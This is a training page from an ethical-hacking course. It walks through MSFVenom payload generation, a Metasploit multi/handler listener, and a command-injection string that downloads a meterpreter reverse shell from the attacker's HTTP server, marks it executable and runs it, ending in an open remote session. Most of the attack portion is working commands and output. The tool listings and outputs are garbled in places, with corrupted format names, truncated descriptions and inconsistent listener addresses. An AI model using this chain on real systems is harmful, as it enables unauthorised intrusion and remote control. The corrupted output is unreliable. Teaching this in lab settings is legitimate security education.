MSFVenom is a command-line based tool in the Metasploit Framework that is used for creating and customizing a "payload" for malware. MSFVenom offers several parameters that allow you to customize your malware, including supported platforms, architectures, payload types, and code types. Users can create malware that works in different environments and provides various attack opportunities.
In this course, a malware is generated using the MSFVenom tool, it is transferred to the target machine using command injection vulnerability, and an remote connection is created with it to Metasploit's listener.
Let's start by familiarizing ourselves with the MSFVenom tool.
root@xh7dqx5tsk-student:/# msfvenom -h MsfVenom - a Metasploit standalone payload generator. Also a replacement for msfpayload and msfencode. Usage: /usr/bin/msfvenom [options]<var=val> Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe Options: -l, --list<type> List all modules for [type]. Types are: payloads, encoders, nops, platforms, archs, encrypt, formats, all -p, --payload<payload> Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom --list-options List --payload<value> 's standard, advanced and evasion options -f, --format<format> Output format (use --list formats to list) -e, --encoder<encoder> The Encoder to use (use --list Encoders to list) --service-name<value> The service name to use when generating a service binary --sec-name<value> The new section name to use when generating large Windows binaries. Default: random 4-character alpha string --smallest Generate the smallest possible payload using all available Encoders --encrypt<value> The type of Encryption or encoding to apply to the shellcode (use --list encrypt to list) --encrypt-key<value> A key to be used for --encrypt --encrypt-iv<value> An initialization vector for --encrypt -a, --arch<arch> The architecture to use for --payload and --encoders (use --list archs to list) --platform<platform> The platform for --payload (use --list platforms to list) -o, --out<path> Save the payload to a file -b, --bad-chars<list> Characters to avoid example: '\x00\xff' -n, --nopsled<length> Prepend a nopsled of [length] size on to the payload --pad-nops Use nopsled size specified by -n<length> as the total payload size, auto-prepending a nopsled of quantity (nops minus payload length) -s, --space<length> The maximum size of the resulting payload --encoder-space<length> The maximum size of the encoded payload (defaults to the -s value) -i, --iterations<count> The number of times to encode the payload -c, --add-code<path> Specify an additional win32 shellcode file to include -x, --template<path> Specify a custom executable file to use as a template -k, --keep Preserve the --template behavior and inject the payload as a new thread -v, --var-name<value> Specify a custom variable name to use for certain output formats -t, --timeout<second> The number of seconds to wait when reading the payload from STDIN (default 30, 0 to disable) -h, --help Show this message root@xh7dqx5tsk-student:/#MSFVenom supports various types of payloads, formats, platforms, etc. The tool may seem complicated, but it is not. Let's start by listing the supported payload types of the msfvenom tool with the command msfvenom -l payloads.
...
windows/meterpreter/bind_hidden_tc Inject the Meterpreter server DLL v
p ia the Reflective Dll Injection pay
load (staged). Requires Windows XP
SP2 or newer. Listen for a connecti
on from a Hidden port and spawn a c
ommand shell to the allowed host.
windows/meterpreter/bind_ipv6_tcp Inject the Meterpreter server DLL v
ia the Reflective Dll Injection pay
load (staged). Requires Windows XP
SP2 or newer. Listen for an IPv6 co
connection (Windows x86)
windows/meterpreter/bind_ipv6_tcp_ Inject the Meterpreter server DLL v
uuid ia the Reflective Dll Injection pay
load (staged). Requires Windows XP
SP2 or newer. Listen for an IPv6 co
connection with UUID Support (Windows
x86)
windows/meterpreter/bind_named_pip Inject the Meterpreter server DLL v
e ia the Reflective Dll Injection pay
load (staged). Requires Windows XP
SP2 or newer. Listen for a pipe con
nection (Windows x86)
windows/meterpreter/bind_nonx_tcp Inject the Meterpreter server DLL v
ia the Reflective Dll Injection pay
load (staged). Requires Windows XP
SP2 or newer. Listen for a connecti
is (No NX)
windows/meterpreter/bind_tcp Inject the Meterpreter server DLL v
ia the Reflective Dll Injection pay
load (staged). Requires Windows XP
SP2 or newer. Listen for a connecti
on (Windows x86)
windows/meterpreter/bind_tcp_rc4 Inject the Meterpreter server DLL v
ia the Reflective Dll Injection pay
load (staged). Requires Windows XP
SP2 or newer. Listen for a connecti
is
windows/meterpreter/bind_tcp_uuid Inject the Meterpreter server DLL v
ia the Reflective Dll Injection pay
load (staged). Requires Windows XP
SP2 or newer. Listen for a connecti
on with UUID Support (Windows x86)
windows/meterpreter/find_tag Inject the Meterpreter server DLL v
ia the Reflective Dll Injection pay
load (staged). Requires Windows XP
SP2 or newer. Use an established co
connection
windows/meterpreter/reverse_hop_ht Inject the Meterpreter server DLL v
tp ia the Reflective Dll Injection pay
load (staged). Requires Windows XP
SP2 or newer. Tunnel communication
over an HTTP or HTTPS hop point. Well
te that you must first upload data/
hop/hop.php to the PHP server you w
ish to use as a hop.
windows/meterpreter/reverse_http Inject the Meterpreter server DLL v
ia the Reflective Dll Injection pay
load (staged). Requires Windows XP
SP2 or newer. Tunnel communication
over HTTP (Windows Winnet)
windows/meterpreter/reverse_http_p Inject the Meterpreter server DLL v
roxy_pstore ia the Reflective Dll Injection pay
load (staged). Requires Windows XP
SP2 or newer. Tunnel communication
over HTTP
windows/meterpreter/reverse_https Inject the Meterpreter server DLL v
ia the Reflective Dll Injection pay
load (staged). Requires Windows XP
SP2 or newer. Tunnel communication
over HTTPS (Windows Winnet)
windows/meterpreter/reverse_https_ Inject the Meterpreter server DLL v
proxy ia the Reflective Dll Injection pay
load (staged). Requires Windows XP
SP2 or newer. Tunnel communication
over HTTP using SSL with custom pro
xy support
windows/meterpreter/reverse_ipv6_t Inject the Meterpreter server DLL v
cp ia the Reflective Dll Injection pay
load (staged). Requires Windows XP
SP2 or newer. Connect back to the a
ttacker over IPv6
windows/meterpreter/reverse_named_ Inject the Meterpreter server DLL v
pipe ia the Reflective Dll Injection pay
load (staged). Requires Windows XP
SP2 or newer. Connect back to the a
ttacker via a named pipe pivot
windows/meterpreter/reverse_nonx_t Inject the Meterpreter server DLL v
cp ia the Reflective Dll Injection pay
load (staged). Requires Windows XP
SP2 or newer. Connect back to the a
ttacker (No NX)
windows/meterpreter/reverse_ord_tc Inject the Meterpreter server DLL v
p ia the Reflective Dll Injection pay
load (staged). Requires Windows XP
SP2 or newer. Connect back to the a
ttacker
windows/meterpreter/reverse_tcp Inject the Meterpreter server DLL v
ia the Reflective Dll Injection pay
load (staged). Requires Windows XP
SP2 or newer. Connect back to the a
ttacker
...As the listing shows, there are countless of them, depending on the platform and the purpose of the attack. Sometimes you may want to create a full remote management connection, while other times you may want to create a VNC connection to a system, for example. There can be many motives and also different types of payloads. Next, let's list the supported formats of msfvenom.
root@xh7dqx5tsk-student:/# msfvenom -l formats
Framework Executable Formats [--format <value>]
===============================================
Name
----
asp
aspx
aspx-exe
axis2
dll
ducky-script-psh
elf
elf-so
exe
exe-only
exe-service
exe-small
hta-psh
jar
etc
loop-vbs
macho
Ms
msi-nouac
osx app
psh
psh-cmd
psh-net
psh reflection
python reflection
etc
vba-exe
vba-psh
etc
war
Framework Transform Formats [--format <value>]
==============================================
Name
----
base32
base64
bash
c
csharp
dw
dword
go
golang
hex
java
js_be
js_le
masm
name
nimlang
no
perl
pl
powershell
ps1
p
python
raw
rb
ruby
Rust
rustlang
incl
vbapplication
vbscript
root@xh7dqx5tsk-student:/#
From the above listing, you can see how the tool supports various formats and coding/scripting languages in which malware can be written. Deciding this also depends entirely on the situation. Is it related to a Windows, Linux, or OS X machine? - Perhaps it is a website?
You can freely try different formats and go through the MSFVenom tool. Next, let's create a practice malware that generates a meterpreter reverse shell to our Kali machine on port 6000.
root@xozrx14hxh-student:/# msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.12.51 LPORT=6000 -f elf -o meterpreter-6000.so
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No Encoder specified, outputting raw payload
Payload size: 130 bytes
Final size of elf file: 250 bytes
Saved as: meterpreter-6000.so
root@xozrx14hxh-student:/#
- -p is used to specify the payload type.
- LHOST is given the IP address of the machine that the malware connects to
- LPORT signifies the port to be contacted
- -f specifies the format
- -o tells where the malicious software is to be saved
Next, we will open the target's web page service and look for a command injection vulnerability in it, which can be found in the web diagnostic tool.
We can exploit this vulnerability and transfer our malware to the target machine. After that, we execute the program through command injection and gain remote control of the machine. However, first we need to set up our own Kali machine to listen so that we can receive the remote connection created by the malware. Let's start msfconsole.
root@xh7dqx5tsk-student:/# msfconsole
Metasploit Park, System Security Interface
Version 4.0.5, Alpha E
Ready...
> access security
access: PERMISSION DENIED.
> access security grid
access: PERMISSION DENIED.
> access main security grid
access: PERMISSION DENIED....and...
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
=[ Metasploit v6.3.31-dev ]
+ -- --=[ 2346 Exploits - 1220 auxiliary - 413 post ]
+ -- --=[ 1387 payloads - 46 Encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: View all productivity tips with the
tips command
Metasploit Documentation: https://docs.metasploit.com/
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) >
Multi/handler works as a server that waits for and listens to connections from attack targets. When an exploit program is executed on the target system, multi/handler establishes a connection to this program and allows the attacker to gain remote access or control over the system.
Multi/handler is especially useful in the context of Metasploit, as it connects to many different attack modules and allows the attacker to choose how they exploit the vulnerability depending on the situation and target system.
You can choose Multi/handler as a module by using the 'use' command as per the above template. Let's check the settings and configure them correctly. We need to select the appropriate meterpreter payload type and set the network settings correctly.
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- -------------- -------- -----------
Payload options (generic/shell_reverse_tcp):
Name Current Setting Required Description
---- -------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listening port
Exploit target:
Id Name
-- ----
0 Wildcard Target
View the full module info with the info, or info -d command.
msf6 exploit(multi/handler) >
msf6 exploit(multi/handler) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
PAYLOAD => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.0.12.254
LHOST => 10.0.12.254
msf6 exploit(multi/handler) > set LPORT 6000
LPORT => 6000
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- -------------- -------- -----------
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- -------------- -------- -----------
LHOST 10.0.12.254 yes The listen address (an interface may be specified)
LPORT 6000 yes The listening port
Exploit target:
Id Name
-- ----
0 Wildcard Target
View the full module info with the info, or info -d command.
msf6 exploit(multi/handler) >
Then, execute the run command and start listening.
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler is 10.0.12.254:6000
Next, we need to transfer the malware we generated to the target machine and execute it. We can do this as follows.
First, let's start the HTTP server to distribute the payload.
root@xh7dqx5tsk-student:/# python3 -m http.server
Serving HTTP is 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
Then we use the following command injection, which downloads our malware, sets permissions for it and executes it.
8.8.8.8 | wget http://10.0.12.51:8000/meterpreter-6000.so && chmod +x meterpreter-6000.so && ./meterpreter-6000.so
Now we should establish a meterpreter command line connection to the server.
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler is 10.0.12.51:6000
[*] Sending stage (3045380 bytes) to 10.0.12.85
[*] Meterpreter session 1 opened (10.0.12.51:6000 -> 10.0.12.85:40476) at 2023-10-16 14:57:09 +0000
meterpreter >
MSFVenom tool and multi/handler are perhaps the most commonly used components in the entire Metasploit suite, due to their versatility and usefulness.
Ready to become an ethical hacker?
Start today.
As a member of Hakatemia you get unlimited access to Hakatemia modules, exercises and tools, and you get access to the Hakatemia Discord channel where you can ask for help from both instructors and other Hakatemia members.